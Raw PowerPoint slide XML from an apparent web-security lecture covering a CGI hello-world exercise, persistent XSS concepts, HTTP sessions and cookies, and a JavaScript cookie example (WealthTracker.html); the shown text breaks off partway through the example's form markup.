            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Firefox on your VM, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>hello.cgi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>It shows "Hello Word! This is my first CGI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>program”.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42594025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200" dirty="0" smtClean="0"/>
              <a:t>Persistent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4200" dirty="0"/>
              <a:t>XSS Attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4200" dirty="0" smtClean="0"/>
              <a:t>(1)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>code injected by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>will be stored in a secondary storage device (mostly on a database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>HTTP protocol is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>stateless, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>which means, it won’t maintain any state with regard to the request and response. All request and response are independent of each </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>other</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Once </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>has authenticated himself, the web server should not ask the username/password for the next request from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>do this, they need to maintain some kind of states between the web-browser and web-server which is done through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Sessions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>login for the first time, a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>session ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>will be created by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>server and it will be sent to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>-browser as “cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>All </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>sub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>-sequent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>requests </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>server, will be based on the “session id” in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3157904488"/>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200" dirty="0" smtClean="0"/>
              <a:t>Persistent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4200" dirty="0"/>
              <a:t>XSS Attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4200" dirty="0" smtClean="0"/>
              <a:t>(2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Demonstration: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>There are two types of users: “Admin” and “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Normal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>”. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>When “Admin” log-in, he can see the list of usernames. When “Normal” users log-in, they can only update their display name</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1777576718"/>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800" dirty="0"/>
              <a:t>Managing Cookies with JavaScript </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Cookies are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>retain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> some data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(state) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>one session to another</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> between a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>and a web server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Enterprise web servers often use cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>stored </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>browsers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>to keep track of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>interaction </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>with their online </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>customers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>from one visit to the next </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>this manner, after a new client has been authenticated with, say, a password on the first contact, the cookies can be relied upon for subsequent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>automatic authentications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>can also be used to store </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>customer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>preferences</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>tracking how customers view a web page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, and so on </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>On Firefox: Tools -&gt; Page Info -&gt; Cookies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>may be possible for third parties to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>steal cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>from an innocent client’s browser by mounting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>cross</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>-site scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>attack </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="298999408"/>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How JavaScript Set/Change Cookies </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>WealthTracker.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>(by Prof. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Avi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Kak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> @ Purdue)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Downloading </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>WealthTracker.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>server constitutes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>one session </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Enter a string for your name and an integer for your wealth, and then click on the submit button. When you click on the Submit button the first time, the browser will show you for verification the information you just entered in the form </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Now just change the number in the “Wealth” box and see what happens. And do this repeatedly. You will see that this page keeps track of how many times you have visited the page in the past and how your wealth has changed from one visit to the next </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>All </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>code in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>is in the form of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>definitions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. A JavaScript function may be executed automatically upon the occurrence of an event or because it has been called in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>that is currently being executed </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>All </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>appears </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>between </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>tags </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Between </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>body&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/body&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>tags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>creates </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>a web form with two text boxes, one for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>name and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>the other for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>wealth</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="327316979"/>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How JavaScript Set/Change Cookies </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;form id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ACKentryform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>action="#"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>onsubmit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>="return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>checkEntry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
